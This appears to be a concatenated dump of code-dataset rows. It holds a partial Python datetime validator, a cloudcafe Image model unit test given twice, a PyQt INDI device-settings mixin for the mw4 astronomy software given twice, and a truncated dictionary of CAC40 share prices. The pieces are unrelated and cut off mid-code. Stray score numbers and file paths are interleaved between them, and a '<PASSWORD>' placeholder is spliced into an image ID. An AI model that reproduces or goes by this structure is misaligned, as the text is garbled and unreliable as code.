datetime_format: DateTimeFormat = DateTimeFormat.ALLOW_TIMEZONE,
*,
local_timezone: Optional[tzinfo] = None,
target_timezone: Optional[tzinfo] = None,
datetime_range: Optional[BaseDateTimeRange] = None,
):
"""
Create a `DateTimeValidator` with a specified datetime string format, optionally a local timezone, a target timezone and/or
a datetime range.
If a target timezone is specified and a format that allows local datetimes is used (ALLOW_TIMEZONE, LOCAL_ONLY or LOCAL_OR_UTC),
the parameter "local_timezone" is required (otherwise it would be unclear how to interpret and convert local datetimes).
To define datetime ranges using the "datetime_range" parameter, see the classes `DateTimeRange` and `DateTimeOffsetRange` from
`validataclass.helpers.datetime_range`.
Parameters:
datetime_format: `DateTimeFormat`, specifies the accepted string formats (default: `ALLOW_TIMEZONE`)
local_timezone: `tzinfo`, specifies the default timezone to set for datetime strings without timezone info (default: None)
target_timezone: `tzinfo`, if specified, all datetimes will be converted to this timezone (default: None)
datetime_range: `BaseDateTimeRange` (subclasses), specifies the range of allowed values (default: None)
"""
# Initialize StringValidator without any parameters
super().__init__()
# Check parameter validity
if target_timezone is not None and datetime_format.allows_local() and local_timezone is None:
raise InvalidValidatorOptionException('Parameter "local_timezone" is required when a datetime format that allows local '
'datetimes is used and "target_timezone" is specified.')
# Save parameters
self.datetime_format = datetime_format
self.local_timezone = local_timezone
self.target_timezone = target_timezone
self.datetime_range = datetime_range
# Precompile regular expression for datetime format
self.datetime_format_regex = re.compile(self.datetime_format.regex_str)
def validate(self, input_data: Any) -> datetime:
"""
Validate input as a valid datetime string and convert it to a `datetime.datetime` object.
"""
# First, validate input data as string
datetime_string = super().validate(input_data)
# Validate string format with a regular expression
if not self.datetime_format_regex.fullmatch(datetime_string):
raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)
# Replace 'Z' suffix to make the string compatible with fromisoformat()
if datetime_string[-1] == 'Z':
datetime_string = datetime_string[:-1] + '+00:00'
# Try to create datetime object from string (accepts a certain subset of ISO 8601 datetime strings)
try:
datetime_obj = datetime.fromisoformat(datetime_string)
except ValueError:
raise InvalidDateTimeError(datetime_format_str=self.datetime_format.format_str)
# Set timezone to local_timezone if no timezone is specified
if datetime_obj.tzinfo is None and self.local_timezone is not None:
datetime_obj = datetime_obj.replace(tzinfo=self.local_timezone)
# Check datetime against datetime_range (if defined)
if self.datetime_range is not None and not self.datetime_range.contains_datetime(datetime_obj, self.local_timezone):
# Add extra fields (lower_boundary, upper_boundary) to the validation error
raise DateTimeRangeError(**self.datetime_range.to_dict(self.local_timezone))
# Convert datetime to target timezone (if defined)
if self.target_timezone is not None:
datetime_obj = datetime_obj.astimezone(self.target_timezone)
return datetime_obj | 0.937009 | 0.674456 |
from copy import deepcopy
import dateutil.parser
import json
import os
import unittest
from cloudcafe.images.common.types import (
ImageContainerFormat, ImageDiskFormat, ImageStatus, ImageVisibility)
from cloudcafe.images.v2.models.image import Image
class TestImage(unittest.TestCase):
    """Unit tests for the Image model: equality, JSON (de)serialization and dict conversion.

    NOTE(review): uses the Python 2 builtin ``unicode`` and ``setup_class`` (nose/pytest
    style rather than unittest's ``setUpClass``) -- presumably this suite runs under a
    Python 2 test runner that supports both; confirm before porting.
    """

    @classmethod
    def setup_class(cls):
        # Raw JSON fixtures read once per class; files are opened without a context
        # manager (Py2-era style), relying on interpreter cleanup to close them.
        cls.raw_image_str = open(os.path.join(
            os.path.dirname(__file__), '../data/image.json')).read()
        cls.raw_images_str = open(os.path.join(
            os.path.dirname(__file__), '../data/images.json')).read()
        # Required due to datetime parser in image client
        date_time = dateutil.parser.parse(unicode('2013-05-22T14:24:36Z'))
        # Reference Image object expected to be equal to the deserialized fixture.
        # NOTE(review): the id_ value contains a '<PASSWORD>' redaction artifact that
        # does not match the UUID used in file_/self_ -- verify against the fixture data.
        cls.image_obj = Image(
            checksum='69c33642f44ca552ba4bb8b66ad97e85',
            container_format=ImageContainerFormat.ARI,
            created_at=date_time,
            disk_format=ImageDiskFormat.ARI,
            file_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7/file',
            id_='21c697d1-2cc5-4a45-<PASSWORD>',
            min_disk=0,
            min_ram=0,
            name='cirros-0.3.1-x86_64-uec-ramdisk',
            protected=False,
            schema='/v2/schemas/image',
            self_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7',
            size=3714968,
            status=ImageStatus.ACTIVE,
            tags=[],
            updated_at=date_time,
            visibility=ImageVisibility.PUBLIC,
            additional_properties={unicode('additional_properties'): {}})
        # Fixture parsed into a plain dict for the _dict_to_obj test
        cls.obj_dict = json.loads(cls.raw_image_str)

    def test_positive_equality(self):
        # An object must equal a deep copy of itself
        assert self.image_obj == deepcopy(self.image_obj)

    def test_negative_equality(self):
        # Changing any attribute must break equality
        different_obj = deepcopy(self.image_obj)
        different_obj.name = 'cirros-fake'
        assert self.image_obj != different_obj

    def test_deserialization_from_json(self):
        # JSON fixture must deserialize to the reference object
        deserialized_obj = Image._json_to_obj(self.raw_image_str)
        assert self.image_obj == deserialized_obj

    def test_dict_to_obj(self):
        # Dict form of the fixture must convert to the reference object
        assert self.image_obj == Image._dict_to_obj(self.obj_dict)

    def test_serialization_to_json(self):
        # Required due to datetime parser in image client
        setattr(self.image_obj, 'created_at', '2013-05-22T14:24:36Z')
        setattr(self.image_obj, 'updated_at', '2013-05-22T14:24:36Z')
        serialized_obj = self.image_obj._obj_to_json()
        # we do this to overcome the property ordering:
        deserialized_obj = Image._json_to_obj(serialized_obj)
        assert set(self.image_obj.__dict__) == set(deserialized_obj.__dict__)
import dateutil.parser
import json
import os
import unittest
from cloudcafe.images.common.types import (
ImageContainerFormat, ImageDiskFormat, ImageStatus, ImageVisibility)
from cloudcafe.images.v2.models.image import Image
class TestImage(unittest.TestCase):
@classmethod
def setup_class(cls):
cls.raw_image_str = open(os.path.join(
os.path.dirname(__file__), '../data/image.json')).read()
cls.raw_images_str = open(os.path.join(
os.path.dirname(__file__), '../data/images.json')).read()
# Required due to datetime parser in image client
date_time = dateutil.parser.parse(unicode('2013-05-22T14:24:36Z'))
cls.image_obj = Image(
checksum='69c33642f44ca552ba4bb8b66ad97e85',
container_format=ImageContainerFormat.ARI,
created_at=date_time,
disk_format=ImageDiskFormat.ARI,
file_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7/file',
id_='21c697d1-2cc5-4a45-<PASSWORD>',
min_disk=0,
min_ram=0,
name='cirros-0.3.1-x86_64-uec-ramdisk',
protected=False,
schema='/v2/schemas/image',
self_='/v2/images/21c697d1-2cc5-4a45-ba50-61fab15ab9b7',
size=3714968,
status=ImageStatus.ACTIVE,
tags=[],
updated_at=date_time,
visibility=ImageVisibility.PUBLIC,
additional_properties={unicode('additional_properties'): {}})
cls.obj_dict = json.loads(cls.raw_image_str)
def test_positive_equality(self):
assert self.image_obj == deepcopy(self.image_obj)
def test_negative_equality(self):
different_obj = deepcopy(self.image_obj)
different_obj.name = 'cirros-fake'
assert self.image_obj != different_obj
def test_deserialization_from_json(self):
deserialized_obj = Image._json_to_obj(self.raw_image_str)
assert self.image_obj == deserialized_obj
def test_dict_to_obj(self):
assert self.image_obj == Image._dict_to_obj(self.obj_dict)
def test_serialization_to_json(self):
# Required due to datetime parser in image client
setattr(self.image_obj, 'created_at', '2013-05-22T14:24:36Z')
setattr(self.image_obj, 'updated_at', '2013-05-22T14:24:36Z')
serialized_obj = self.image_obj._obj_to_json()
# we do this to overcome the property ordering:
deserialized_obj = Image._json_to_obj(serialized_obj)
assert set(self.image_obj.__dict__) == set(deserialized_obj.__dict__) | 0.568416 | 0.268213 |
import PyQt5
# local import
from mw4.base.indiClass import IndiClass
class SettIndi(object):
"""
the main window class handles the main menu as well as the show and no show part of
any other window. all necessary processing for functions of that gui will be linked
to this class. therefore window classes will have a threadpool for managing async
processing if needed.
"""
# INDI device types
GENERAL_INTERFACE = 0
TELESCOPE_INTERFACE = (1 << 0)
CCD_INTERFACE = (1 << 1)
GUIDER_INTERFACE = (1 << 2)
FOCUSER_INTERFACE = (1 << 3)
FILTER_INTERFACE = (1 << 4)
DOME_INTERFACE = (1 << 5)
GPS_INTERFACE = (1 << 6)
WEATHER_INTERFACE = (1 << 7)
AO_INTERFACE = (1 << 8)
DUSTCAP_INTERFACE = (1 << 9)
LIGHTBOX_INTERFACE = (1 << 10)
DETECTOR_INTERFACE = (1 << 11)
AUX_INTERFACE = (1 << 15)
    def __init__(self):
        """
        Build the INDI device bookkeeping table and wire up the gui signals.

        self.indiDevices maps a device key (e.g. 'dome', 'imaging') to a dict of:
        - uiName/uiDevice/uiSearch/uiMessage: gui widgets for driver selection, status,
          device search button (None if no search is offered) and message checkbox
        - searchType: INDI interface bitmask used by the search (None if unsupported)
        - class/signals: the device object and its INDI client signals
        - dispatch: handler called when the selected driver changes
        - port/host: line-edit widgets for the INDI server address

        NOTE(review): relies on self.ui, self.app and the dispatch/share/show handlers
        being provided by the consuming class (this is a mixin) -- confirm at call site.
        """
        # Runtime state for an ongoing INDI device search (reset between searches)
        self.indiClass = None
        self.indiDeviceList = list()
        self.indiSearchType = None
        # Central device table: all per-device gui elements, callbacks and objects
        self.indiDevices = {
            'dome':
                {'uiName': self.ui.domeDeviceName,
                 'uiDevice': self.ui.domeDevice,
                 'uiSearch': self.ui.searchDomeDevices,
                 'searchType': self.DOME_INTERFACE,
                 'uiMessage': self.ui.domeDeviceMessage,
                 'class': self.app.dome,
                 'dispatch': self.domeDispatch,
                 'signals': self.app.dome.client.signals,
                 'port': self.ui.domePort,
                 'host': self.ui.domeHost,
                 },
            'imaging':
                {'uiName': self.ui.imagingDeviceName,
                 'uiDevice': self.ui.imagingDevice,
                 'uiSearch': self.ui.searchImagingDevices,
                 'searchType': self.CCD_INTERFACE,
                 'uiMessage': self.ui.imagingDeviceMessage,
                 'class': self.app.imaging,
                 'dispatch': self.imagingDispatch,
                 'signals': self.app.imaging.client.signals,
                 'port': self.ui.imagingPort,
                 'host': self.ui.imagingHost,
                 },
            'sensorWeather':
                {'uiName': self.ui.sensorWeatherDeviceName,
                 'uiDevice': self.ui.sensorWeatherDevice,
                 'uiSearch': self.ui.searchSensorWeatherDevices,
                 'searchType': self.WEATHER_INTERFACE,
                 'uiMessage': self.ui.sensorWeatherDeviceMessage,
                 'class': self.app.sensorWeather,
                 'dispatch': self.sensorWeatherDispatch,
                 'signals': self.app.sensorWeather.client.signals,
                 'port': self.ui.sensorWeatherPort,
                 'host': self.ui.sensorWeatherHost,
                 },
            'cover':
                {'uiName': self.ui.coverDeviceName,
                 'uiDevice': self.ui.coverDevice,
                 'uiSearch': None,
                 'searchType': None,
                 'uiMessage': self.ui.coverDeviceMessage,
                 'class': self.app.cover,
                 'dispatch': self.coverDispatch,
                 'signals': self.app.cover.client.signals,
                 'port': self.ui.coverPort,
                 'host': self.ui.coverHost,
                 },
            'skymeter':
                {'uiName': self.ui.skymeterDeviceName,
                 'uiDevice': self.ui.skymeterDevice,
                 'uiSearch': None,
                 'searchType': None,
                 'uiMessage': self.ui.skymeterDeviceMessage,
                 'class': self.app.skymeter,
                 'dispatch': self.skymeterDispatch,
                 'signals': self.app.skymeter.client.signals,
                 'port': self.ui.skymeterPort,
                 'host': self.ui.skymeterHost,
                 },
            'telescope':
                {'uiName': self.ui.telescopeDeviceName,
                 'uiDevice': self.ui.telescopeDevice,
                 'uiSearch': None,
                 'searchType': None,
                 'uiMessage': self.ui.telescopeDeviceMessage,
                 'class': self.app.telescope,
                 'dispatch': self.telescopeDispatch,
                 'signals': self.app.telescope.client.signals,
                 'port': self.ui.telescopePort,
                 'host': self.ui.telescopeHost,
                 },
            'power':
                {'uiName': self.ui.powerDeviceName,
                 'uiDevice': self.ui.powerDevice,
                 'uiSearch': None,
                 'searchType': None,
                 'uiMessage': self.ui.powerDeviceMessage,
                 'class': self.app.power,
                 'dispatch': self.powerDispatch,
                 'signals': self.app.power.client.signals,
                 'port': self.ui.powerPort,
                 'host': self.ui.powerHost,
                 },
        }
        # signals from functions: connect every device's gui widgets and INDI client
        # signals to the corresponding handlers (search button only where present)
        for name, item in self.indiDevices.items():
            item['uiName'].currentIndexChanged.connect(item['dispatch'])
            item['host'].editingFinished.connect(self.shareServer)
            item['port'].editingFinished.connect(self.shareServer)
            if item['uiSearch'] is not None:
                item['uiSearch'].clicked.connect(self.searchDevices)
            item['uiMessage'].clicked.connect(self.shareMessage)
            item['signals'].serverDisconnected.connect(self.showIndiDisconnected)
            item['signals'].deviceConnected.connect(self.showDeviceConnected)
            item['signals'].deviceDisconnected.connect(self.showDeviceDisconnected)
        self.setupDeviceNameGui()
def initConfig(self):
"""
initConfig read the key out of the configuration dict and stores it to the gui
elements. if some initialisations have to be proceeded with the loaded persistent
data, they will be launched as well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
uiList = self.indiDevices[device]['uiName']
deviceList = config.get(f'{device}Devices', [])
for deviceItem in deviceList:
if deviceItem == 'No device driver selected':
continue
uiList.addItem(deviceItem)
for name, item in self.indiDevices.items():
self.indiDevices[name]['uiName'].setCurrentIndex(config.get(f'{name}Name', 0))
self.indiDevices[name]['uiMessage'].setChecked(config.get(f'{name}Message', False))
self.indiDevices[name]['port'].setText(config.get(f'{name}Port', '7624'))
self.indiDevices[name]['host'].setText(config.get(f'{name}Host', ''))
self.ui.shareIndiServer.setChecked(config.get('shareIndiServer', True))
self.shareServer()
self.shareMessage()
return True
def storeConfig(self):
"""
storeConfig writes the keys to the configuration dict and stores. if some
saving has to be proceeded to persistent data, they will be launched as
well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
model = self.indiDevices[device]['uiName'].model()
deviceList = []
for index in range(model.rowCount()):
if model.item(index).text() == 'No device driver selected':
continue
deviceList.append(model.item(index).text())
config[f'{device}Devices'] = deviceList
for name, item in self.indiDevices.items():
config[f'{name}Name'] = self.indiDevices[name]['uiName'].currentIndex()
config[f'{name}Message'] = self.indiDevices[name]['uiMessage'].isChecked()
config[f'{name}Port'] = self.indiDevices[name]['port'].text()
config[f'{name}Host'] = self.indiDevices[name]['host'].text()
config['shareIndiServer'] = self.ui.shareIndiServer.isChecked()
return True
def setupDeviceNameGui(self):
"""
setupRelayGui handles the dropdown lists for all devices possible in mountwizzard.
therefore we add the necessary entries to populate the list.
:return: success for test
"""
dropDowns = list(self.indiDevices[device]['uiName'] for device in self.indiDevices)
for dropDown in dropDowns:
dropDown.clear()
dropDown.setView(PyQt5.QtWidgets.QListView())
dropDown.addItem('No device driver selected')
self.indiDevices['skymeter']['uiName'].addItem('SQM')
self.indiDevices['telescope']['uiName'].addItem('LX200 10micron')
self.indiDevices['power']['uiName'].addItem('Pegasus UPB')
self.indiDevices['cover']['uiName'].addItem('Flip Flat')
return True
def shareServer(self):
"""
shareServer is called whenever a indi server host is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return:
"""
ports = list(self.indiDevices[device]['port'] for device in self.indiDevices)
hosts = list(self.indiDevices[device]['host'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, host, port in zip(baseClasses, hosts, ports):
if self.ui.shareIndiServer.isChecked():
if self.sender() != host and self.sender() in hosts:
host.setText(self.sender().text())
if self.sender() != port and self.sender() in ports:
port.setText(self.sender().text())
baseClass.client.host = (host.text(), int(port.text()))
return True
def shareMessage(self):
"""
shareMessage is called whenever a indi message checkbox is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return: true for test purpose
"""
messages = list(self.indiDevices[device]['uiMessage'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, message in zip(baseClasses, messages):
if self.ui.shareIndiServer.isChecked():
if self.sender() != message and self.sender() in messages:
message.setChecked(self.sender().isChecked())
baseClass.showMessages = message.isChecked()
return True
def showIndiDisconnected(self, deviceList):
"""
showIndiDisconnected writes info to message window and recolors the status
:return: true for test purpose
"""
if not deviceList:
return False
deviceName = list(deviceList.keys())[0]
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
return True
def showDeviceConnected(self, deviceName):
"""
showCoverDeviceConnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_GREEN)
self.deviceStat[device] = True
return True
def showDeviceDisconnected(self, deviceName):
"""
showCoverDeviceDisconnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
self.deviceStat[device] = False
return True
def searchDevices(self):
"""
searchDevices implements a search for devices of a certain device type. it is called
from a button press and checks which button it was. after that for the right device
it collects all necessary data for host value, instantiates an INDI client and
watches for all devices connected to this server. Than it connects a subroutine for
collecting the right device names and opens a model dialog. the data collection
takes place as long as the model dialog is open. when the user closes this dialog, the
collected data is written to the drop down list.
:return: true for test purpose
"""
self.indiDeviceList = list()
for device in self.indiDevices:
# simplify
devObj = self.indiDevices[device]
if devObj['uiSearch'] != self.sender():
continue
host = (devObj['host'].text(),
int(devObj['port'].text()),
)
self.indiClass = IndiClass(host=host)
self.indiSearchType = devObj['searchType']
self.indiClass.client.signals.defText.connect(self.addDevicesWithType)
self.indiClass.client.connectServer()
self.indiClass.client.watchDevice()
msg = PyQt5.QtWidgets.QMessageBox
msg.critical(self,
'Searching Devices',
f'Search for {device} could take some seconds!')
self.indiClass.client.disconnectServer()
self.indiClass = None
self.indiSearchType = None
devObj['uiName'].clear()
devObj['uiName'].setView(PyQt5.QtWidgets.QListView())
devObj['uiName'].addItem('No device driver selected')
for deviceName in self.indiDeviceList:
devObj['uiName'].addItem(deviceName)
return True
def addDevicesWithType(self, deviceName, propertyName):
"""
addDevicesWithType gety called whenever a new device send out text messages. than it
checks, if the device type fits to the search type desired. if they match, the
device name is added to the list.
:param deviceName:
:param propertyName:
:return: success
"""
device = self.indiClass.client.devices[deviceName]
interface = device.getText(propertyName).get('DRIVER_INTERFACE', None)
if interface is None:
return False
if self.indiSearchType is None:
return False
interface = int(interface)
if interface & self.indiSearchType:
self.indiDeviceList.append(deviceName)
return True | mw4/gui/mainWmixin/tabSettIndi.py | import PyQt5
# local import
from mw4.base.indiClass import IndiClass
class SettIndi(object):
"""
the main window class handles the main menu as well as the show and no show part of
any other window. all necessary processing for functions of that gui will be linked
to this class. therefore window classes will have a threadpool for managing async
processing if needed.
"""
# INDI device types
GENERAL_INTERFACE = 0
TELESCOPE_INTERFACE = (1 << 0)
CCD_INTERFACE = (1 << 1)
GUIDER_INTERFACE = (1 << 2)
FOCUSER_INTERFACE = (1 << 3)
FILTER_INTERFACE = (1 << 4)
DOME_INTERFACE = (1 << 5)
GPS_INTERFACE = (1 << 6)
WEATHER_INTERFACE = (1 << 7)
AO_INTERFACE = (1 << 8)
DUSTCAP_INTERFACE = (1 << 9)
LIGHTBOX_INTERFACE = (1 << 10)
DETECTOR_INTERFACE = (1 << 11)
AUX_INTERFACE = (1 << 15)
def __init__(self):
self.indiClass = None
self.indiDeviceList = list()
self.indiSearchType = None
self.indiDevices = {
'dome':
{'uiName': self.ui.domeDeviceName,
'uiDevice': self.ui.domeDevice,
'uiSearch': self.ui.searchDomeDevices,
'searchType': self.DOME_INTERFACE,
'uiMessage': self.ui.domeDeviceMessage,
'class': self.app.dome,
'dispatch': self.domeDispatch,
'signals': self.app.dome.client.signals,
'port': self.ui.domePort,
'host': self.ui.domeHost,
},
'imaging':
{'uiName': self.ui.imagingDeviceName,
'uiDevice': self.ui.imagingDevice,
'uiSearch': self.ui.searchImagingDevices,
'searchType': self.CCD_INTERFACE,
'uiMessage': self.ui.imagingDeviceMessage,
'class': self.app.imaging,
'dispatch': self.imagingDispatch,
'signals': self.app.imaging.client.signals,
'port': self.ui.imagingPort,
'host': self.ui.imagingHost,
},
'sensorWeather':
{'uiName': self.ui.sensorWeatherDeviceName,
'uiDevice': self.ui.sensorWeatherDevice,
'uiSearch': self.ui.searchSensorWeatherDevices,
'searchType': self.WEATHER_INTERFACE,
'uiMessage': self.ui.sensorWeatherDeviceMessage,
'class': self.app.sensorWeather,
'dispatch': self.sensorWeatherDispatch,
'signals': self.app.sensorWeather.client.signals,
'port': self.ui.sensorWeatherPort,
'host': self.ui.sensorWeatherHost,
},
'cover':
{'uiName': self.ui.coverDeviceName,
'uiDevice': self.ui.coverDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.coverDeviceMessage,
'class': self.app.cover,
'dispatch': self.coverDispatch,
'signals': self.app.cover.client.signals,
'port': self.ui.coverPort,
'host': self.ui.coverHost,
},
'skymeter':
{'uiName': self.ui.skymeterDeviceName,
'uiDevice': self.ui.skymeterDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.skymeterDeviceMessage,
'class': self.app.skymeter,
'dispatch': self.skymeterDispatch,
'signals': self.app.skymeter.client.signals,
'port': self.ui.skymeterPort,
'host': self.ui.skymeterHost,
},
'telescope':
{'uiName': self.ui.telescopeDeviceName,
'uiDevice': self.ui.telescopeDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.telescopeDeviceMessage,
'class': self.app.telescope,
'dispatch': self.telescopeDispatch,
'signals': self.app.telescope.client.signals,
'port': self.ui.telescopePort,
'host': self.ui.telescopeHost,
},
'power':
{'uiName': self.ui.powerDeviceName,
'uiDevice': self.ui.powerDevice,
'uiSearch': None,
'searchType': None,
'uiMessage': self.ui.powerDeviceMessage,
'class': self.app.power,
'dispatch': self.powerDispatch,
'signals': self.app.power.client.signals,
'port': self.ui.powerPort,
'host': self.ui.powerHost,
},
}
# signals from functions
for name, item in self.indiDevices.items():
item['uiName'].currentIndexChanged.connect(item['dispatch'])
item['host'].editingFinished.connect(self.shareServer)
item['port'].editingFinished.connect(self.shareServer)
if item['uiSearch'] is not None:
item['uiSearch'].clicked.connect(self.searchDevices)
item['uiMessage'].clicked.connect(self.shareMessage)
item['signals'].serverDisconnected.connect(self.showIndiDisconnected)
item['signals'].deviceConnected.connect(self.showDeviceConnected)
item['signals'].deviceDisconnected.connect(self.showDeviceDisconnected)
self.setupDeviceNameGui()
def initConfig(self):
"""
initConfig read the key out of the configuration dict and stores it to the gui
elements. if some initialisations have to be proceeded with the loaded persistent
data, they will be launched as well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
uiList = self.indiDevices[device]['uiName']
deviceList = config.get(f'{device}Devices', [])
for deviceItem in deviceList:
if deviceItem == 'No device driver selected':
continue
uiList.addItem(deviceItem)
for name, item in self.indiDevices.items():
self.indiDevices[name]['uiName'].setCurrentIndex(config.get(f'{name}Name', 0))
self.indiDevices[name]['uiMessage'].setChecked(config.get(f'{name}Message', False))
self.indiDevices[name]['port'].setText(config.get(f'{name}Port', '7624'))
self.indiDevices[name]['host'].setText(config.get(f'{name}Host', ''))
self.ui.shareIndiServer.setChecked(config.get('shareIndiServer', True))
self.shareServer()
self.shareMessage()
return True
def storeConfig(self):
"""
storeConfig writes the keys to the configuration dict and stores. if some
saving has to be proceeded to persistent data, they will be launched as
well in this method.
:return: True for test purpose
"""
config = self.app.config['mainW']
for device in ['imaging', 'dome', 'sensorWeather']:
model = self.indiDevices[device]['uiName'].model()
deviceList = []
for index in range(model.rowCount()):
if model.item(index).text() == 'No device driver selected':
continue
deviceList.append(model.item(index).text())
config[f'{device}Devices'] = deviceList
for name, item in self.indiDevices.items():
config[f'{name}Name'] = self.indiDevices[name]['uiName'].currentIndex()
config[f'{name}Message'] = self.indiDevices[name]['uiMessage'].isChecked()
config[f'{name}Port'] = self.indiDevices[name]['port'].text()
config[f'{name}Host'] = self.indiDevices[name]['host'].text()
config['shareIndiServer'] = self.ui.shareIndiServer.isChecked()
return True
def setupDeviceNameGui(self):
"""
setupRelayGui handles the dropdown lists for all devices possible in mountwizzard.
therefore we add the necessary entries to populate the list.
:return: success for test
"""
dropDowns = list(self.indiDevices[device]['uiName'] for device in self.indiDevices)
for dropDown in dropDowns:
dropDown.clear()
dropDown.setView(PyQt5.QtWidgets.QListView())
dropDown.addItem('No device driver selected')
self.indiDevices['skymeter']['uiName'].addItem('SQM')
self.indiDevices['telescope']['uiName'].addItem('LX200 10micron')
self.indiDevices['power']['uiName'].addItem('Pegasus UPB')
self.indiDevices['cover']['uiName'].addItem('Flip Flat')
return True
def shareServer(self):
"""
shareServer is called whenever a indi server host is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return:
"""
ports = list(self.indiDevices[device]['port'] for device in self.indiDevices)
hosts = list(self.indiDevices[device]['host'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, host, port in zip(baseClasses, hosts, ports):
if self.ui.shareIndiServer.isChecked():
if self.sender() != host and self.sender() in hosts:
host.setText(self.sender().text())
if self.sender() != port and self.sender() in ports:
port.setText(self.sender().text())
baseClass.client.host = (host.text(), int(port.text()))
return True
def shareMessage(self):
"""
shareMessage is called whenever a indi message checkbox is edited. if checkbox
for sharing is set, the new entry will be copied to all other indi servers
:return: true for test purpose
"""
messages = list(self.indiDevices[device]['uiMessage'] for device in self.indiDevices)
baseClasses = list(self.indiDevices[device]['class'] for device in self.indiDevices)
for baseClass, message in zip(baseClasses, messages):
if self.ui.shareIndiServer.isChecked():
if self.sender() != message and self.sender() in messages:
message.setChecked(self.sender().isChecked())
baseClass.showMessages = message.isChecked()
return True
def showIndiDisconnected(self, deviceList):
"""
showIndiDisconnected writes info to message window and recolors the status
:return: true for test purpose
"""
if not deviceList:
return False
deviceName = list(deviceList.keys())[0]
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
return True
def showDeviceConnected(self, deviceName):
"""
showCoverDeviceConnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_GREEN)
self.deviceStat[device] = True
return True
def showDeviceDisconnected(self, deviceName):
"""
showCoverDeviceDisconnected changes the style of related ui groups to make it clear
to the user, which function is actually available
:return: true for test purpose
"""
for device in self.indiDevices:
if self.indiDevices[device]['class'].name != deviceName:
continue
self.indiDevices[device]['uiDevice'].setStyleSheet(self.BACK_NORM)
self.deviceStat[device] = False
return True
def searchDevices(self):
"""
searchDevices implements a search for devices of a certain device type. it is called
from a button press and checks which button it was. after that for the right device
it collects all necessary data for host value, instantiates an INDI client and
watches for all devices connected to this server. Than it connects a subroutine for
collecting the right device names and opens a model dialog. the data collection
takes place as long as the model dialog is open. when the user closes this dialog, the
collected data is written to the drop down list.
:return: true for test purpose
"""
self.indiDeviceList = list()
for device in self.indiDevices:
# simplify
devObj = self.indiDevices[device]
if devObj['uiSearch'] != self.sender():
continue
host = (devObj['host'].text(),
int(devObj['port'].text()),
)
self.indiClass = IndiClass(host=host)
self.indiSearchType = devObj['searchType']
self.indiClass.client.signals.defText.connect(self.addDevicesWithType)
self.indiClass.client.connectServer()
self.indiClass.client.watchDevice()
msg = PyQt5.QtWidgets.QMessageBox
msg.critical(self,
'Searching Devices',
f'Search for {device} could take some seconds!')
self.indiClass.client.disconnectServer()
self.indiClass = None
self.indiSearchType = None
devObj['uiName'].clear()
devObj['uiName'].setView(PyQt5.QtWidgets.QListView())
devObj['uiName'].addItem('No device driver selected')
for deviceName in self.indiDeviceList:
devObj['uiName'].addItem(deviceName)
return True
def addDevicesWithType(self, deviceName, propertyName):
"""
addDevicesWithType gety called whenever a new device send out text messages. than it
checks, if the device type fits to the search type desired. if they match, the
device name is added to the list.
:param deviceName:
:param propertyName:
:return: success
"""
device = self.indiClass.client.devices[deviceName]
interface = device.getText(propertyName).get('DRIVER_INTERFACE', None)
if interface is None:
return False
if self.indiSearchType is None:
return False
interface = int(interface)
if interface & self.indiSearchType:
self.indiDeviceList.append(deviceName)
return True | 0.383757 | 0.175821 |
date = '16/03/2020'
data = {
'LVMH': [298, 150e9, 'Consumer goods'] ,
'L\'OREAL': [208, 116e9, 'Consumer goods'],
'SANOFI' : [77.0, 96.0e9, 'Health care'],
'AIRBUS' : [69, 54.0e9, 'Industrials'],
'TOTAL' : [24.3, 63.3e9, 'Oil and gas'],
'HERMES' : [548, 57.9e9, 'Consumer goods'],
'KERING' : [378, 47.7e9, 'Consumer services'],
'AIR LIQUIDE' : [99.2, 47.0e9, 'Basic materials'],
'BNP PARIBAS' : [27.4, 34.3e9, 'Financials'],
'VINCI' : [59.0, 35.8e9, 'Industrials'],
'ESSILORLUXOTTICA' : [96.0, 41.9e9, 'Health care'],
'SCHNEIDER ELECTRIC' : [70.4, 41.0e9, 'Industrials'],
'AXA' : [13.4, 32.5e9, 'Financials'],
'SAFRAN' : [74.5, 29.9e9, 'Industrials'],
'DANONE' : [54.0, 37.0e9, 'Consumer goods'],
'<NAME>' : [122, 32.4e9, 'Consumer goods'],
'ENGIE' : [10.0, 24.3e9, 'Utilities'],
'DASSAULT SYSTEMES' : [108, 28.5e9, 'Technology'],
'ORANGE' : [9.40, 25.0e9, 'Telecommunications'],
'CREDIT AGRICOLE' : [6.08, 17.5e9, 'Financials'],
'VIVENDI' : [17.6, 20.8e9, 'Consumer services'],
'SOCIETE GENERALE' : [14.5, 12.4e9,'Financials'],
